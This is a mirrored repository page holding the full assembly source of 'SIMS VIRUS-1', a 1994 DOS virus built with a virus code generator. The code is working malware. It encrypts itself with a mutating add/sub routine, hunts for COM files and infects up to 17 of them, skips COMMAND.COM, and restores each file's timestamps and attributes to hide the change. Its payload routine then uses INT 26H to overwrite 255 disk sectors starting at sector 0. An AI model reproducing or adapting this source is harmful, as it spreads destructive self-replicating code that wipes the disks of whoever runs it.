mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-24 04:15:26 +00:00
4b9382ddbc
push
226 lines
5.2 KiB
NASM
226 lines
5.2 KiB
NASM
;²±°ÝþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþÞ°±²
|
|
;²±°Ý Þ°±²
|
|
;²±°Ý METRiC BUTTLOAD of CODE GENERATOR Þ°±²
|
|
;²±°Ý Copyright(c) 1994 - MBC - Ver. 0.91b Þ°±²
|
|
;²±°Ý Þ°±²
|
|
;²±°ÝþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþÞ°±²
|
|
|
|
.MODEL TINY
|
|
.CODE
|
|
ORG 100H
|
|
ENTRY_POINT: DB 0E9H,0,0
|
|
|
|
DECRYPT:
|
|
MOV BP,(OFFSET HEAP - OFFSET STARTENCRYPT)/2
|
|
PATCH_STARTENCRYPT:
|
|
MOV bp,OFFSET STARTENCRYPT
|
|
DECRYPT_LOOP:
|
|
DB 81h,46h,0 ; ADD WORD PTR [bp], xxxx
|
|
DECRYPT_VALUE DW 0
|
|
inc bp
|
|
inc bp
|
|
DEC BP
|
|
JNZ DECRYPT_LOOP
|
|
STARTENCRYPT:
|
|
CALL NEXT
|
|
NEXT: POP BP
|
|
SUB BP,OFFSET NEXT
|
|
|
|
LEA SI,[BP+SAVE3]
|
|
MOV DI,100H
|
|
PUSH DI
|
|
MOVSW
|
|
MOVSB
|
|
|
|
MOV BYTE PTR [BP+NUMINFEC],17
|
|
|
|
MOV AH,1AH
|
|
LEA DX,[BP+NEWDTA]
|
|
INT 21H
|
|
|
|
LEA DX,[BP+COM_MASK]
|
|
MOV AH,4EH
|
|
MOV CX,7
|
|
FINDFIRSTNEXT:
|
|
INT 21H
|
|
JC DONE_INFECTIONS
|
|
|
|
MOV AL,0H
|
|
CALL OPEN
|
|
|
|
MOV AH,3FH
|
|
LEA DX,[BP+BUFFER]
|
|
MOV CX,1AH
|
|
INT 21H
|
|
|
|
MOV AH,3EH
|
|
INT 21H
|
|
|
|
CHECKCOM:
|
|
MOV AX,WORD PTR [BP+NEWDTA+35]
|
|
CMP AX,'DN'
|
|
JZ FIND_NEXT
|
|
|
|
MOV AX,WORD PTR [BP+NEWDTA+1AH]
|
|
CMP AX,1430
|
|
JB FIND_NEXT
|
|
|
|
CMP AX,65535-(ENDHEAP-DECRYPT)
|
|
JA FIND_NEXT
|
|
|
|
MOV BX,WORD PTR [BP+BUFFER+1]
|
|
ADD BX,HEAP-DECRYPT+3
|
|
CMP AX,BX
|
|
JE FIND_NEXT
|
|
JMP INFECT_COM
|
|
FIND_NEXT:
|
|
MOV AH,4FH
|
|
JMP SHORT FINDFIRSTNEXT
|
|
|
|
DONE_INFECTIONS:
|
|
JMP ACTIVATE
|
|
EXIT_VIRUS:
|
|
MOV AH,1AH
|
|
MOV DX,80H
|
|
INT 21H
|
|
RETN
|
|
SAVE3 DB 0CDH,20H,0
|
|
|
|
ACTIVATE:
|
|
;²±°ÝþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþÞ°±²
|
|
;²±°Ý LITTLE FRISKIES SMOKE 'EM ROUTINE! Þ°±²
|
|
;²±°ÝþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþþÞ°±²
|
|
;
|
|
PROC BLISTER_LIPS
|
|
PUSH DX
|
|
MOV AL,DL
|
|
MOV CX,255
|
|
XOR DX,DX
|
|
INT 26H
|
|
ADD SP,2
|
|
POP DX
|
|
ENDP BLISTER_LIPS
|
|
|
|
JMP EXIT_VIRUS
|
|
|
|
INFECT_COM:
|
|
MOV CX,3
|
|
SUB AX,CX
|
|
LEA SI,[BP+OFFSET BUFFER]
|
|
LEA DI,[BP+OFFSET SAVE3]
|
|
MOVSW
|
|
MOVSB
|
|
MOV BYTE PTR [SI-3],0E9H
|
|
MOV WORD PTR [SI-2],AX
|
|
ADD AX,103H
|
|
PUSH AX
|
|
FINISHINFECTION:
|
|
PUSH CX
|
|
XOR CX,CX
|
|
CALL ATTRIBUTES
|
|
|
|
MOV AL,2
|
|
CALL OPEN
|
|
|
|
MOV AH,40H
|
|
LEA DX,[BP+BUFFER]
|
|
POP CX
|
|
INT 21H
|
|
|
|
MOV AX,4202H
|
|
XOR CX,CX
|
|
CWD ; XOR DX,DX
|
|
INT 21H
|
|
|
|
MOV AH,2CH
|
|
INT 21H
|
|
MOV [BP+DECRYPT_VALUE],DX
|
|
LEA DI,[BP+CODE_STORE]
|
|
MOV AX,5355H
|
|
STOSW
|
|
LEA SI,[BP+DECRYPT]
|
|
MOV CX,STARTENCRYPT-DECRYPT
|
|
PUSH SI
|
|
PUSH CX
|
|
REP MOVSB
|
|
|
|
XOR BYTE PTR [BP+DECRYPT_LOOP+1],028h ; flip between add/sub
|
|
|
|
LEA SI,[BP+WRITE]
|
|
MOV CX,ENDWRITE-WRITE
|
|
REP MOVSB
|
|
POP CX
|
|
POP SI
|
|
POP DX
|
|
PUSH DI
|
|
PUSH SI
|
|
PUSH CX
|
|
REP MOVSB
|
|
MOV AX,5B5DH
|
|
STOSW
|
|
MOV AL,0C3H
|
|
STOSB
|
|
|
|
ADD DX,OFFSET STARTENCRYPT - OFFSET DECRYPT
|
|
MOV WORD PTR [BP+PATCH_STARTENCRYPT+1],DX
|
|
CALL CODE_STORE
|
|
POP CX
|
|
POP DI
|
|
POP SI
|
|
REP MOVSB
|
|
|
|
MOV AX,5701H
|
|
MOV CX,WORD PTR [BP+NEWDTA+16H]
|
|
MOV DX,WORD PTR [BP+NEWDTA+18H]
|
|
INT 21H
|
|
|
|
MOV AH,3EH
|
|
INT 21H
|
|
|
|
MOV CH,0
|
|
MOV CL,BYTE PTR [BP+NEWDTA+15h]
|
|
CALL ATTRIBUTES
|
|
|
|
DEC BYTE PTR [BP+NUMINFEC]
|
|
JNZ MO_INFECTIONS
|
|
JMP DONE_INFECTIONS
|
|
MO_INFECTIONS: JMP FIND_NEXT
|
|
|
|
OPEN:
|
|
MOV AH,3DH
|
|
LEA DX,[BP+NEWDTA+30]
|
|
INT 21H
|
|
XCHG AX,BX
|
|
RET
|
|
|
|
ATTRIBUTES:
|
|
MOV AX,4301H
|
|
LEA DX,[BP+NEWDTA+30]
|
|
INT 21H
|
|
RET
|
|
|
|
WRITE:
|
|
POP BX
|
|
POP BP
|
|
MOV AH,40H
|
|
LEA DX,[BP+DECRYPT]
|
|
MOV CX,HEAP-DECRYPT
|
|
INT 21H
|
|
PUSH BX
|
|
PUSH BP
|
|
ENDWRITE:
|
|
|
|
COM_MASK DB '*.?OM',0
|
|
MACHINE DB '-=MBC=-',0
|
|
VIRUSNAME DB 'SIMS VIRUS-1',0
|
|
USER DB 'White Shark',0
|
|
|
|
HEAP:
|
|
|
|
CODE_STORE: DB (STARTENCRYPT-DECRYPT)*2+(ENDWRITE-WRITE)+1 DUP (?)
|
|
NEWDTA DB 43 DUP (?)
|
|
NUMINFEC DB ?
|
|
BUFFER DB 1AH DUP (?)
|
|
ENDHEAP:
|
|
END ENTRY_POINT
|